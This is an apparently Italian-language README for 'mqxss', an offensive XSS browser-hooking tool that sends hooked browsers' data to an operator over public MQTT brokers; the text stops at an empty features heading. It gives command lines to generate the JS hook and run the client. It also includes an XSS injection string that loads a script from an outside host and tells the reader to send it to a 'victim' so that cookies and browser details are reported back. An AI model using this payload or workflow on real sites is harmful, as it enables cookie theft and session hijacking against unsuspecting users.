
Comunicazione del browser agganciato tramite MQTT.

Il vantaggio rispetto a beef o xsshunter è che oltre a ospitare il payload js non c'è configurazione dell'infrastruttura, puoi usare un broker pubblico (anche se attualmente usa offuscamento, la crittografia è in lavorazione).
I browser hookati comunicheranno nel topic MQTT sul broker che specifichi; ci sono molti broker pubblici/gratuiti per testare.
Il client utilizza la libreria python paho.mqtt mentre il payload js utilizza 'mqttws31.min.js' che scarica da qui 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.

Per generare un payload JS per hookare i browser, imposta il flag -g all'esecuzione insieme alle variabili broker, porta e topic. In questo modo creerai il tuo payload nella cartella /js/.
Per eseguire il client fornisci broker, porta e topic in questo modo
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
Per eseguire il client con le credenziali fornisci broker, porta, nome utente, password e topic in questo modo
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
Invia il tuo payload XSS alla vittima mentre il client mqxss è in esecuzione, es.: '"><script src=https://example.com/x.js async></script> o qualcosa di simile; se vulnerabile dovresti ricevere una notifica che dice che il browser si è connesso con alcuni dettagli di base inclusi cookie ecc.

Caratteristiche: